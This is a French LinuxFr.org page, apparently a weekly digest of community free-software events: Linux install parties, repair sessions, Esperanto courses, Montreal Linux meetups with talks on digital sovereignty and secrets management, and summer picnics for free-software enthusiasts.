LinuxFr.org propose des dĂ©pĂȘches et articles, soumis par tout un chacun, puis revus et corrigĂ©s par lâĂ©quipe de modĂ©ration avant publication. Câest la partie la plus visible de LinuxFr.org, ce sont les dĂ©pĂȘches qui sont le plus lues et suivies, sur le site, via Atom/RSS, ou bien via partage par messagerie instantanĂ©e, par courriel, ou encore via mĂ©dias sociaux.

Ce que lâon sait moins, câest que LinuxFr.org vous propose Ă©galement de publier directement vos propres articles, sans validation a priori de lÊŒĂ©quipe de modĂ©ration. Ceux-ci sâappellent des journaux. Voici un florilĂšge dâune dizaine de ces journaux parmi les mieux notĂ©s par les utilisateurs et les utilisatrices⊠qui notent. LumiĂšre sur ceux du mois de juin passĂ©.
Commentaires : voir le flux Atom ouvrir dans le navigateur
Calendrier Web, regroupant des Ă©vĂ©nements liĂ©s au Libre (logiciel, salon, atelier, install party, confĂ©rence), annoncĂ©s par leurs organisateurs. Voici un rĂ©capitulatif de la semaine Ă venir. Le dĂ©tail de chacun de ces 30 Ă©vĂ©nements (France: 25, Belgique: 2, Internet: 2, QuĂ©bec: 1) est en seconde partie de dĂ©pĂȘche.
Tous les lundis de 10h Ă 17h sans interruption, lâassociation Prends-toi en main / atelier abcpc, propose install party, suivi, dĂ©pannage, formation et revalorisation Ă petit prix sous Linux exclusivement.
Lâatelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.
Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.
Rencontrer les bĂ©nĂ©voles, poser des questions sur le libre ou lâinformatique, les logiciels, lâhĂ©bergement, passer de Windows Ă Linux.
Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.
Saluton,
Je vous propose des cours dâespĂ©ranto gratuits qui dĂ©buteront le lundi 8 juin Ă Sainte-HĂ©lĂšne dans le MĂ©doc et qui sera Ă©galement disponible en visioconfĂ©rence.
Le cours est destinĂ© aux apprenants francophones de France et dâailleurs.
LâespĂ©ranto est plus quâune langue neutre et trĂšs facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilitĂ©s dâhĂ©bergement ou de fraterniser avec des personnes du monde entier.
Vous trouverez plus dâinformations sur la page WikipĂ©dia, le site EspĂ©ranto-Gironde ou en visualisant le documentaire "ESPĂRANTO: de la genĂšse Ă la conquĂȘte de lâEurope"
Les cours ont lieu le lundi soir de 19h30 Ă 21h30 sur environ 10 soirs pour rĂ©aliser les 10 leçons. Ces leçons complĂšteront les cours papier ou dâapplication telle que Duolingo.
Début: lundi 8 juin 2026.
Les cours sont GRATUITS pour tous.
Le cours est en prĂ©sentiel Ă Sainte-HĂ©lĂšne (33480) au foyer des sociĂ©tĂ©s en collaboration avec lâassociation lâĂcurieux, ainsi quâen distanciel / visioconfĂ©rence.
Ce cours est gratuit pour tous, en présentiel ou en distanciel.
Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque⊠afin de pratiquer en situation réelle.
NâhĂ©sitez pas Ă nous contacter par tĂ©lĂ©phone au 0688350981 (appel, SMS, Signal) pour plus dâinformations ou pour vous inscrire.
Vivu Esperanto kaj Äis la revido.
Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.
Marre de Windows et envie dâun peu de libertĂ©, venez le libĂ©rer!
Présentation de différents outils concernant les logiciels libres.
Assistance technique.
De prĂ©fĂ©rence sur RDV directement sur le site de lâasso
Local de la rencontre: Ăcole de Technologie SupĂ©rieure local B-0904
Rencontre virtuelle: Suivez le lien sur la page de lâĂ©vĂ©nement
17:00 Ă 19:00 â 5 Ă 7 virtuel et en prĂ©sentiel
Rejoignez-nous pour un moment de dĂ©tente et de convivialitĂ© lors de notre 5 Ă 7. Que vous prĂ©fĂ©riez nous retrouver au Resto-Pub 100 GĂ©nies de lâĂTS ou en ligne sur BigBlueButton (BBB), lâessentiel est de partager un moment agrĂ©able. Si vous avez lâintention de venir en personne, veuillez nous en informer afin de pouvoir rĂ©server suffisamment de place pour vous.
18:30 Ă 19:00 â Installation et tests de lâenvironnement hybride (tests de son et vidĂ©o)
Nous assurerons que lâenvironnement hybride soit parfaitement opĂ©rationnel en effectuant des tests de son et de vidĂ©o.
19:00 Ă 21:30 â Programmation de la rencontre
Jérémy viendra vulgariser et partager le résultat de 27 ans en recherche-action sur les communautés de pratiques ouvertes, de développement libre et open source.
Pas de blabla inutile: un format court, dense et accessible pour comprendre les clĂ©s dâune gouvernance collaborative efficace.
Une courte prĂ©sentation inspirante Ă ne pas manquer pour tous les passionnĂ©s de lâĂ©cosystĂšme libre. đ§
A propos de Jérémy Viau-Trudel
Ayant une trajectoire atypique, JĂ©rĂ©my Viau-Trudelvient de la chimie quantique. Pendant ses Ă©tudes supĂ©rieures Ă lâUniversitĂ© Laval, puis Ă lâUniversitĂ© Paris-Sud, il a menĂ© des recherches de haut niveau sur la simulation de la dynamique Ă©lectronique de molĂ©cules soumises Ă des champs laser intenses. Câest lĂ , dâabord par nĂ©cessitĂ©, quâil a commencĂ© Ă utiliser Linux. Depuis une dizaine dâannĂ©es, il est consultant TI spĂ©cialisĂ© en Linux et intervient rĂ©guliĂšrement sur des mandats DevSecOps. Son approche pragmatique lâa amenĂ© Ă travailler aussi bien sur des infrastructures on-premise quâen infonuagique et en edge computing.
Présentation 1: La portée de la souveraineté: How far can we go ? par Alex Blackie
[Présentation en anglais]
La souveraineté numérique ne se résume pas à héberger ses serveurs localement. DerriÚre chaque application se cache une chaßne complÚte de dépendances: code source, plateformes de développement, infrastructures infonuagiques, matériel, réseaux et fournisseurs de services.
Lors de cette prĂ©sentation, Alex Blackie proposera une rĂ©flexion sur les limites et les possibilitĂ©s dâune vĂ©ritable souverainetĂ© technologique. Est-il rĂ©aliste de construire une chaĂźne dâapprovisionnement entiĂšrement nationale, du dĂ©veloppement logiciel jusquâĂ lâinfrastructure physique ? Quels compromis faut-il accepter, et quels bĂ©nĂ©fices peut-on en retirer ?
Cette prĂ©sentation sâadresse aux dĂ©veloppeurs, administrateurs systĂšmes, professionnels des infrastructures ainsi quâĂ toute personne intĂ©ressĂ©e par les enjeux de souverainetĂ© numĂ©rique, de logiciel libre et dâinfonuagique.
à propos du présentateur
Alex Blackieest dĂ©veloppeur logiciel, administrateur systĂšmes et rĂ©seaux, ainsi quâentrepreneur. Fort de plus de quinze annĂ©es dâexpĂ©rience dans lâindustrie des technologies de lâinformation, il sâintĂ©resse depuis longtemps aux enjeux de souverainetĂ© numĂ©rique et aux infrastructures ouvertes.
Il est le fondateur de BlackieOps, lâentreprise derriĂšre Worktree, une plateforme canadienne de dĂ©veloppement collaboratif et une alternative Ă GitHub, accompagnĂ©e dâune offre infonuagique axĂ©e sur les besoins des organisations canadiennes. Ă travers ses projets, Alex Ćuvre Ă bĂątir des solutions technologiques ouvertes qui redonnent aux organisations un meilleur contrĂŽle sur leurs donnĂ©es et leurs infrastructures.
PrĂ©sentation 2 â ACRA: une suite logicielle libre dâobservabilitĂ© pour la sĂ©curitĂ© de nos infrastructures sur site et infonuagiques par Kitio Fofack
Les infrastructures informatiques modernes sont de plus en plus complexes, rĂ©parties entre serveurs sur site, environnements virtualisĂ©s, conteneurs et services infonuagiques. Dans ce contexte, disposer dâune visibilitĂ© complĂšte sur lâĂ©tat de ses systĂšmes est devenu essentiel pour assurer leur performance, leur fiabilitĂ© et leur sĂ©curitĂ©.
Lors de cette prĂ©sentation, Kitio Fofack nous fera dĂ©couvrir ACRA, une suite logicielle libre dâobservabilitĂ© conçue pour surveiller et protĂ©ger les infrastructures informatiques. Nous explorerons comment la collecte et lâanalyse des mĂ©triques, journaux et Ă©vĂ©nements permettent de dĂ©tecter rapidement les anomalies, dâamĂ©liorer la rĂ©silience des systĂšmes et de renforcer la posture de sĂ©curitĂ© des organisations.
Cette prĂ©sentation sâadresse aux administrateurs systĂšmes, professionnels DevOps, spĂ©cialistes de la cybersĂ©curitĂ© ainsi quâĂ toute personne intĂ©ressĂ©e par les solutions libres de surveillance et dâobservabilitĂ©. Des exemples concrets permettront dâillustrer comment ACRA peut ĂȘtre dĂ©ployĂ© aussi bien dans des environnements sur site que dans des infrastructures infonuagiques.
à propos du présentateur:
Fondateur/ReprĂ©sentant de lâIREX et ConfĂ©rencier international
Pionnier et Ă©vangĂ©liste des communs numĂ©riques, jâĆuvre pour la rĂ©appropriation des technologies Ă des fins sociĂ©tales. Ă travers lâInstitut du Retour dâExpĂ©rience (IREX), je dĂ©veloppe des infrastructures libres conçues comme les fondations dâun modĂšle Ă©conomique plus Ă©quitable. De la souverainetĂ© alimentaire en agriculture biologique Ă la pĂ©rennitĂ© de notre systĂšme de santĂ©, en passant par la crĂ©ation dâemplois locaux non dĂ©localisables, je dĂ©montre que le logiciel libre est une rĂ©ponse directe aux crises contemporaines. Reconnu pour cet engagement, jâai Ă©tĂ© invitĂ© Ă prĂ©senter cette interconnexion entre technologies ouvertes et objectifs de dĂ©veloppement durable lors des prestigieux UN Open Source Days 2025.
PrĂ©sentation 3 â SĂ©curisation des variables dâenvironnement et souverainetĂ©: lâapproche KeyHarbour par Denis Fabien et Ătienne Morency
La sĂ©curitĂ© dâune application ne dĂ©pend pas uniquement de la qualitĂ© de son code. Les variables dâenvironnement, clĂ©s dâAPI, mots de passe et autres secrets utilisĂ©s en production reprĂ©sentent souvent une surface dâattaque sous-estimĂ©e. Comment protĂ©ger efficacement ces informations sensibles tout en facilitant le travail des Ă©quipes de dĂ©veloppement et dâexploitation ?
Lors de cette prĂ©sentation, Denis Fabien et Ătienne Morency nous feront dĂ©couvrir KeyHarbour, une solution souveraine basĂ©e sur des standards ouverts permettant dâĂ©liminer le stockage statique des secrets dans les fichiers de configuration. Nous verrons comment lâinjection dynamique de secrets peut amĂ©liorer la sĂ©curitĂ©, rĂ©duire les risques dâexposition et renforcer la traçabilitĂ© des accĂšs aux informations sensibles.
Cette prĂ©sentation sâadresse particuliĂšrement aux administrateurs systĂšmes, spĂ©cialistes DevOps, responsables de la sĂ©curitĂ© et Ă©quipes dâinfrastructure qui souhaitent offrir aux dĂ©veloppeurs un environnement Ă la fois plus sĂ©curitaire, plus simple Ă gĂ©rer et mieux adaptĂ© aux exigences des infrastructures modernes.
Ă propos des prĂ©sentateurs: Denis Fabien est consultant et coach DevOps auprĂšs de grandes entreprises. Depuis le dĂ©but de sa carriĂšre, il a Ă©voluĂ© entre le dĂ©veloppement logiciel et lâadministration de systĂšmes (notamment Linux).Cette double expertise lâa naturellement conduit vers le DevOps, et plus particuliĂšrement vers lâautomatisation des dĂ©ploiements et la gestion des infrastructures. Il est Ă©galement responsable des partenariats chez KeyHarbour.
Ătienne Morency est architecte de solutions et passionnĂ© par les technologies ouvertes et lâoptimisation des environnements TI. Il accompagne les organisations dans la conception et la mise en place de solutions robustes, pragmatiques et durables. Son expĂ©rience couvre lâarchitecture, lâautomatisation, lâintĂ©gration et lâaccompagnement des Ă©quipes techniques. Il agit Ă©galement comme directeur technique de KeyHarbour, oĂč il contribue Ă orienter les choix technologiques et lâĂ©volution des solutions.
Une pĂ©riode dâĂ©change de trucs et astuces sous Linux, oĂč chacun est encouragĂ© Ă partager ses connaissances.
Extras
Que vous soyez dĂ©butant ou expert, Ă©tudiant ou professionnel, cette rĂ©union est ouverte Ă tous. Elle rĂ©unit une diversitĂ© de personnes, allant des gestionnaires aux programmeurs, des professeurs aux retraitĂ©s, unissant ainsi des esprits passionnĂ©s par les logiciels libres, quel que soit votre domaine dâexpertise.
Rejoignez-nous pour cette opportunitĂ© exceptionnelle de socialiser, dâapprendre, et de tisser des liens avec dâautres passionnĂ©s. Ensemble, nous pouvons approfondir notre comprĂ©hension des logiciels libres et contribuer Ă une communautĂ© dynamique.
La participation est gratuite, et nous avons hĂąte de vous rencontrer, que ce soit en personne ou en ligne. Inscrivez-vous dĂšs maintenant pour recevoir le lien de la rĂ©union virtuelle, et pensez Ă nous informer si vous prĂ©voyez de vous joindre Ă nous au Resto-Pub 100 GĂ©nies de lâĂTS.
Au plaisir de partager cette soirée exceptionnelle avec vous!
Cordialement,
Comité organisateur des Rencontres Linux au Québec P.S.: Pour le transport en commun : Station de métro Bonaventure
CâEST QUOIÂ ?
Commencez votre été avec le festival Polar en Vacances !
Traditionnel rendez-vous jeunesse donnĂ© par Quais du Polar au mois de juillet, Polar en Vacances revient pour sa 11á” Ă©dition les mercredi 8 et jeudi 9 juillet 2026 afin de promouvoir la lecture et lâĂ©criture auprĂšs des plus jeunes !
Au programme : des ateliers dâĂ©criture, dâillustration et de dĂ©coupage, un espace dĂ©diĂ© Ă la lecture, un espace jeux de sociĂ©tĂ©, un escape game et un espace librairie jeunesse qui accueillera les dĂ©dicaces de nos autrices et illustratrices invitĂ©es. Cette annĂ©e, la thĂ©matique sera centrĂ©e autour des « Petits et grands hĂ©ros »
Les ateliers sont GRATUITS et sur inscription obligatoire pour les groupes et recommandée pour les familles.
Dans le cadre de la stratégie Rev3 de la ville de Fourmies est né le Central, Carrefour de la Résilience.
Ă ce titre, lâAssociation Club Linux Nord Pas-de-Calais Fourmies vous accompagne et vous guide dans la configuration, la personnalisation et la prise en main de vos logiciels (Libres).
Câest un espace de rencontres et dâĂ©changes, uniquement basĂ©s sur les logiciels libres et le concept de lâopen source.
De 13h30 Ă 17h00 tous les mercredi, venez prendre en main vos logiciels libres et vos installations Linux Mint ou Mageia.
La permanence du libre est un complément des install parties du samedi.
Cette manifestation a lieu au Tiers-Lieu Le Central Ă Fourmies.
Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.
Marre de Windows et envie dâun peu de libertĂ©, venez le libĂ©rer!
Nous sommes convaincus depuis le dĂ©but quâun ordinateur nâest pas un consommable jetable et quâon a tous le droit de comprendre et de maĂźtriser nos outils numĂ©riques. Câest de lĂ quâest nĂ©e lâasso, Ă Gond-Pontouvre: un repaire de passionnĂ©s du libre et du bidouillage, oĂč lâon dĂ©fend les logiciels libres, la souverainetĂ© technologique et le bon vieux plaisir de mettre les mains dans le cambouis. Au fil du temps, on a Ă©largi le terrain de jeu, mais lâesprit reste le mĂȘme: on apprend, on partage, on transmet.
Le cĆur historique, câest le reconditionnement. On collecte des machines en fin de vie, on les teste sous toutes les coutures, et on leur offre une seconde jeunesse: passage en SSD pour rĂ©veiller les plus poussives, installation de Linux Mint pour un systĂšme libre, lĂ©ger et accessible, et hop â un PC quâon croyait bon pour la benne repart pour plusieurs annĂ©es.
Vous avez un vieux portable qui rame ou une tour oubliée au grenier? Apportez-la, on regarde ensemble.
CĂŽtĂ© fabrication numĂ©rique, le FabLab ouvre ses portes: venez concevoir et fabriquer vos projets sur nos machines â impression 3D (Creality K1 Max & K2 Plus), dĂ©coupe et gravure laser (Falcon 2 Pro 60W), et de quoi toucher Ă
lâĂ©lectronique embarquĂ©e. Les bĂ©nĂ©voles sont lĂ pour vous guider â lâidĂ©e nâest pas de faire Ă votre place, mais de vous apprendre Ă faire.
EntrĂ©e libre, esprit dâentraide et de partage des savoirs. Apportez vos questions, vos machines ou simplement votre curiositĂ©.
Aujourdâhui, le risque de voir pirater ses diffĂ©rents comptes en ligne est trĂšs Ă©levĂ©. Afin de sâen protĂ©ger, nous devons avoir des mots de passe complexes, diffĂ©rents pour chaque service et pouvoir les modifier rĂ©guliĂšrement. Cela devient un vĂ©ritable casse-tĂȘte.
Lâassociation Ourse a pour objet dâanimer et administrer notre monnaie locale. Ce faisant, nous avons dâautant plus besoin de nous mettre Ă lâabri des risques de vols de donnĂ©es. Câest pourquoi nous avons dĂ» notamment apprendre la maĂźtrise du gestionnaire de mots de passe libre KeepassXC.
Cette formation vise Ă diffuser auprĂšs des bĂ©nĂ©voles lâutilisation de ce logiciel et la mise en place de pratiques sĂ©curisĂ©es et est ouverte Ă tous.
Sur inscription sur ce formulaire ; places limitĂ©es et des tĂ©lĂ©chargements sont recommandĂ©s en amont. Apporter son ordinateur portable et smartphone. Lâobjectif est dâen ressortir avec les compĂ©tences et tout le systĂšme nĂ©cessaire installĂ© et fonctionnel sur vos appareils.
Dâautres sĂ©ances pourront ĂȘtre proposĂ©es ultĂ©rieurement.
đ»đ± Ton ordi rame avec Windows? Tâas entendu parler de Linux sans oser te lancer?
Viens Ă une Install Party chez EmmaĂŒs Connect Ă Marseille!
On tâinforme et on tâaide Ă installer Linux Mint sur ton ordi, gratuitement, dans la bonne humeur et entouré·e de bĂ©nĂ©voles super cool đ
Tu repars avec un PC rafraĂźchi⊠et zĂ©ro centime dĂ©pensĂ© đž
đŻ Câest pour toi si:
đ OĂč ? 11 cours Franklin Roosevelt, Marseille 1er
đ Quand? RĂ©union dâinformation le 08/07 Ă 18h, Install'Party le 18/07 Ă 9h30.
Inscription uniquement par mail Ă marseille@emmaus-connect.org
Rejoins-nous pour une expérience libre, écolo et solidaire!
Réunion ouverte à tous, adhérent ou pas.
Les réunions mensuelles Hadoly ont lieu tous les 2ᔠmercredi du mois, à partir de 19h.
Soit en prĂ©sentiel dans les locaux de la maison de lâĂ©cologie â 4 rue Bodin 69001 Lyon
Soit en distanciel sur lâadresse https://jitsi.hadoly.fr/permanence-hadoly.
à propos de cet événement
La permanence (mensuelle) dâHadoly (HĂ©bergeur Associatif DĂ©centralisĂ© et Ouvert Ă LYon), chaton lyonnais, est lâoccasion dâĂ©changer avec les membres de lâasso sur les services et moyens mis Ă disposition des adhĂ©rents afin de se libĂ©rer des Gafams tout en partageant ce que chacun·e aura amenĂ© pour grignoter ou boire.
Nous partageons du mail, du cloud, et dâautres services, le tout basĂ© exclusivement sur une infrastructure locale et des logiciels libres. Nous respectons la neutralitĂ© du net et la vie privĂ©e. Plus largement nous Ă©changeons autour des communs numĂ©riques, des cultures libres et de lâĂ©ducation populaire par exemple en rĂ©alisant ou animant des ateliers dâĂ©ducation aux mĂ©dias.
Vous serez bienvenu pour présenter votre projet, celui de votre organisation, causer communs numériques, cultures libres et éduc pop.
Saluton,
Nous proposons une nouvelle session de cours dâEspĂ©ranto qui dĂ©buteront dĂ©but juin au cafĂ© Le Petit Grain, Place Dormoy Ă Bordeaux (câest un cafĂ© associatif avec des tarifs abordables dans le quartier de la gare Saint-Jean Ă cĂŽtĂ© de Barbey).
LâespĂ©ranto est plus quâune langue neutre et facile, mais aussi une langue fraternelle et libre qui permet de voyager dans le monde entier avec des facilitĂ©s dâhĂ©bergement ou de fraterniser avec des personnes dans dâautres pays.
Cette vidĂ©o vous permettra dâen savoir plus: https://peertube.dc.pini.fr/w/akMZAKM9zJWG5mXLBtuQN4
Vous trouverez Ă©galement plus dâinformations sur: https://esperanto-gironde.fr/lesperanto/, il y a lâabonnement Ă la lettre dâinformations mensuelle qui est proposĂ©e en fin de chaque page afin de rester informĂ© des activitĂ©s espĂ©rantistes du coin.
Les cours ont lieu le mercredi soir de 20h00 Ă 22h00, 10 soirs pour rĂ©aliser les 10 leçons. Ces leçons complĂštent le cours de lâapplication Duolingo.
Début: mercredi 3 juin 2026.
Les cours sont GRATUITS pour les membres du café associatif.
Cependant, vous devrez adhĂ©rer au cafĂ© associatif Le Petit Grain qui nous prĂȘte chaleureusement ses locaux si vous nâĂȘtes pas membre. LâadhĂ©sion annuelle pour toute lâannĂ©e 2026 est Ă prix libre conseillĂ© Ă 5âŹ, minimum 2⏠et permet aussi la participation aux autres ateliers et activitĂ©s.
NâhĂ©sitez pas Ă nous contacter par tĂ©lĂ©phone au 0688350981 (appel, SMS, Signal) ou en rĂ©pondant Ă ce message pour plus dâinformations ou pour vous inscrire.
Vous pouvez aussi nous rencontrer chaque 3á” mercredi du mois de 18h00 Ă 19h30 au cafĂ© Le Petit Grain ainsi que lors du dĂ©filĂ© du 1á”Êł mai autour de notre banderole.
Äis la revido.
Mini-webinaire plutÎt orienté enseignement primaire/secondaire.
Suite Ă lâarrĂȘt annoncĂ© par RĂ©seau CanopĂ© de la plateforme CanoprofCloud pour le 31 juillet 2026, nous te prĂ©senterons un nouveau service en ligne proposĂ© par Kelis ainsi que dâautres solutions pour aider Ă rĂ©cupĂ©rer et continuer Ă utiliser les contenus Canoprof. Nous en profiterons pour refaire un point sur le contexte et le vocabulaire autour du systĂšme Scenari.
Toutes les informations sur https://info.prof.scenari.cloud/
Atelier sur les logiciels libres.
Installation et configuration.
HygiÚne numérique.
Nous organisons la 1e Install Party a Romans-Sur-Isere au cafe associatif le PasSage
Venez decouvrir le logiciel libre, discuter autour dâun verre, installer votre pc avec un systeme libre.
Lâoccasion idĂ©ale pour se retrouver, Ă©changer autour du logiciel libre, vous accompagner dans le remplacement de Windows par Linux sur vos machines (sans dual-boot), ou encore dĂ©couvrir ensemble de nouvelles distributions et applications.
MĂ©diathĂšque de QuimperlĂ©, place Saint Michel, pas dâinscription, entrĂ©e libre !
MickaĂ«l, Johann, Alain, et Yves vous accueillent (ou lâun dâeux, on se relaie !).
Conseils, aide et infos pratiques GNU/Linux et Logiciels Libres.
Curieux ? DĂ©jĂ utilisateur ? Expert ? Pour rĂ©soudre vos problĂšmes, vous ĂȘtes le bienvenu ; pas besoin de prendre rendez-vous !
NâhĂ©sitez pas Ă venir avec votre PC si vous voulez une installation de GNU/Linux ou de venir avec votre pĂ©riphĂ©rique rĂ©calcitrant (imprimante, scannerâŠ) si possible.
Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.
Marre de Windows et envie dâun peu de libertĂ©, venez le libĂ©rer!
La plus grande LAN partie sous linux de Brest cet Ă©tĂ© đ„
Venez avec ou sans votre ordinateur, sous Linux ou BSD đ§
Que vous vouliez vous exploser sur Xonotic ou Teeworlds, reconstruire les 4 moulins dans Luanti, ou ĂȘtre le meilleur stratĂšge du siĂšcle dans 0ad, vous passerez forcĂ©ment un bon moment đ
Entrée libre pour tout le monde.
--
Le local est accessible aux personnes à mobilité réduite
Il y a des arceaux à vélo à proximité
LâarrĂȘt de bus le plus proche est: Cosmao PrĂ©tot, ligne 2B
LâarrĂȘt de tramway le plus proche est: Polygone
Les membres de l'Axul (Association du Pays dâAix des Utilisateurs de Linux et des Logiciels Libres) vous invitent Ă leur rĂ©union rĂ©elle du vendredi 10 juillet de 20h00 Ă 23h00 au Centre Culturel Georges Duby du Tholonet, 744 avenue Paul Julien, Ă proximitĂ© de la place du marchĂ© de Palette (premier village sur la D7n au Sud-Est dâAix).
Organisation des listes de diffusion
Autres questions ?
ĂvĂšnements ultĂ©rieurs: voir l'Agenda du Libre
Ces réunions libres et gratuites sont ouvertes à toutes et à tous, débutantEs ou expertEs GNU/Linux, membres ou non de l'Axul.
Entrée Libre. Tout Public.
Pause Café Linux: Votre rendez-vous hebdomadaire
Est-ce que Linux vous passionne ? Vous voulez simplement jaser de logiciels libres dans une ambiance dĂ©contractĂ©e ? Rejoignez-nous pour la Pause CafĂ© Linux, un rendez-vous unique dans la francophonie Linuxienne ! Câest le moment idĂ©al pour briser lâisolement, partager vos dĂ©couvertes et rencontrer dâautres passionnĂ©s de lâĂ©cosystĂšme Linux au QuĂ©bec.
Câest quand ?
Tous les vendredis midis (12h00 HAE, Québec).
Apportez votre lunch, nous fournissons le café⊠virtuellement !
Au programme
Comment participer ?
Venez avec votre lunch, votre café, et surtout votre curiosité !
La participation est gratuite, ouvert Ă tous!
Notre rĂ©union accueille une diversitĂ© de profils: Ă©tudiants, professionnels, gestionnaires, programmeurs, professeurs, ou retraitĂ©s. Que votre passion soit lâadministration systĂšme, le dĂ©veloppement, ou la simple utilisation quotidienne, votre expĂ©rience est prĂ©cieuse. Ensemble, nous pouvons approfondir notre comprĂ©hension des logiciels libres et contribuer Ă une communautĂ© dynamique.
Rejoignez-nous pour cette opportunitĂ© exceptionnelle de socialiser, dâapprendre, et de tisser des liens !
Nous avons hĂąte de vous y accueillir.
Le Comité organisateur des Rencontres Linux au Québec
Rencontre mensuelle autour des logiciels libres, en toute simplicité.
Ces matinées seront ce que nous en ferons ensemble, selon vos attentes:
Pour tout projet qui risque de prendre un peu de temps, il est préférable de nous contacter avant.
Les dĂ©butant·e·s sont les bienvenu·e·s! Les autres aussi, bien Ă©videmmentâŻ!
REVOL, association engagĂ©e dans la promotion des logiciels libres, propose tous les samedis matin, de 9h Ă 12h, une permanence informatique associative ouverte Ă toustes, pour se pencher sur les difficultĂ©s rencontrĂ©es par chacun·e dans son usage de lâoutil numĂ©rique.
=> Vous avez un problÚme avec votre ordinateur ?
=> Une question sur un logiciel libre ?
=> Envie de comprendre un peu mieux comment ça fonctionne ?
On prend le temps avec vous, simplement.
Nous pouvons vous accompagner sur:
Et aussi⊠juste discuter (on a du café et des croissants).
Que ce soit pour poser une question, réfléchir à vos usages ou découvrir le libre tranquillement.
Pas besoin dâĂȘtre expert·e: venez comme vous ĂȘtes.
Nous sommes Ă notre local, 22 rue de Verdun Ă Chaumont (52000), en Haute-Marne.
Un monde plus libre, loin des techno-fascistes, ça serait đŠ quand mĂȘme, non ?
REVOL est là pour y contribuer !
Montpelâlibre et ses partenaires vous proposent de nous retrouver comme chaque annĂ©e toutes et tous, pour clore cette annĂ©e trĂšs intense dans un esprit festif, Ă lâoccasion dâun pique-nique au Parc Rimbaud dans le quartier Les Aubes de Montpellier. OĂč, les familles, enfants, curieux et bien sĂ»r libristes sont les bienvenus.
Ce pique-nique traditionnel de fin dâannĂ©e des libristes de toute la rĂ©gion est organisĂ© pour boucler lâannĂ©e dans la bonne humeur, Ă©voquer les moments importants qui se sont dĂ©roulĂ©s dans lâannĂ©e et ceux qui nous attendent Ă la rentrĂ©e. Ce traditionnel rendez-vous est devenu, au fil du temps et selon la presse, une vĂ©ritable institution.
Nous serions heureux de compter sur votre présence à cet instant convivial et de partage de la communauté des Logiciels Libres et des Communs de la région.
Attention, privilégiez les transports en commun, les emplacements de parking à proximité sont rares!
Lâinscription nâest pas obligatoire, mais fortement recommandĂ©e pour des raisons Ă©videntes de contraintes logistique.
Cette annĂ©e encore, afin de nous mettre en conformitĂ© avec lâarrĂȘtĂ© prĂ©fectoral, les barbecues et tout feu seront interdits, le repas sera donc froid.
Pas de réseau wifi, ni électrique, pensez à prendre des lampes.
Le site dispose Ă lâentrĂ©e dâune petite aire de jeux pour les enfants, dâun parc clĂŽturĂ© pour les chiens, de balades, randonnĂ©es, tables, potager, boulodrome, vue sur le riviĂšre.
Chacun apporte quelque chose, et on partage. Pensez Ă prendre de lâeau, des brumisateurs, des chapeaux pour supporter les fortes chaleurs. PrĂ©voyez aussi des boules de pĂ©tanque.
Rencontre | Wiknic
Ce pique-nique traditionnel de fin dâannĂ©e des libristes de toute la rĂ©gion est organisĂ© pour boucler lâannĂ©e dans la bonne humeur, Ă©voquer les moments importants qui se sont dĂ©roulĂ©s dans lâannĂ©e et ceux qui nous attendent Ă la rentrĂ©e. Ce traditionnel rendez-vous est devenu, au fil du temps et selon la presse, une vĂ©ritable institution.
Samedi 11 juillet 2026 de 19h00 Ă 21h00
Parc Rimbaud, 880 avenue de Saint-Maur, 34000 Montpellier
Inscriptions | GPS 43.61797/3.89607
Fin du support Windows? Ne jetez pas votre PC: venez découvrir et installer Linux sur votre ordinateur.
Plusieurs bĂ©nĂ©voles Ă lâaise en informatique prendront le temps de connaitre votre situation, et de vous proposer une marche Ă suivre.
Si possible, préparez vos sauvegardes des documents importants avant de venir.
Sinon, venez avec un disque dur ou clé USB de grande capacité pour les sauvegarder avec notre aide et un peu de temps (la sauvegarde de vos données peut prendre du temps!).
Entrée libre et gratuite,
Organisé par le Collectif Low Tech du Pays de Redon
Fin du support Windows ? Ne jetez pas votre PC: venez découvrir et installer Linux sur votre ordinateur.
Plusieurs bĂ©nĂ©voles Ă lâaise en informatique prendront le temps de connaitre votre situation, et de vous proposer une marche Ă suivre.
Si possible, préparez vos sauvegardes des documents importants avant de venir.
Sinon, venez avec un disque dur ou clé USB de grande capacité pour les sauvegarder avec notre aide et un peu de temps (la sauvegarde de vos données peut prendre du temps !).
Entrée libre et gratuite, rdv 14h
Organisé par le Collectif Low Tech du Pays de Redon
Montpelâlibre vous propose de nous retrouver toutes et tous, pour clore cette annĂ©e trĂšs intense dans un esprit festif, Ă lâoccasion dâun pique-nique au Plateau des PoĂštes, AllĂ©es Paul Riquet Ă BĂ©ziers. OĂč, les familles, enfants, curieux et bien sĂ»r libristes sont les bienvenus.
Ce pique-nique de fin dâannĂ©e des libristes de toute la rĂ©gion est organisĂ© pour boucler lâannĂ©e dans la bonne humeur, Ă©voquer les moments importants qui se sont dĂ©roulĂ©s dans lâannĂ©e et ceux qui nous attendent Ă la rentrĂ©e.
Les pique-niques de lâĂ©tĂ©
Samedi 11 juillet 2026 Ă partir de 17h00, Pique-nique du Libre, au Parc Rimbaud Ă Montpellier.
Samedi 11 juillet 2026 à partir de 19h00, Wiknic (Cabalhérault), au Parc Rimbaud à Montpellier.
Dimanche 12 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Plateau des PoÚtes à Béziers.
Samedi 18 juillet 2026 Ă partir de 17h00, Pique-nique du Libre, aux Jardins de la Fontaine Ă NĂźmes.
Dimanche 19 juillet 2026 Ă partir de 17h00, Pique-nique du Libre, Ă Pierres Blanches Ă SĂšte.
Dimanche 26 juillet 2026 Ă partir de 17h00, Pique-nique du Libre, au Parc Jean Hugo Ă Lunel.
Choisissez votre pique-nique. Mais bien sûr, vous pouvez participer à plusieurs pique-niques, voire à tous !
LâĂ©tĂ© est lĂ , bien installĂ©, les oiseaux chantent, le soleil est au beau fixe, et vous souhaitez dĂ©jeuner entre amis sur lâherbe fraĂźchement coupĂ©e.
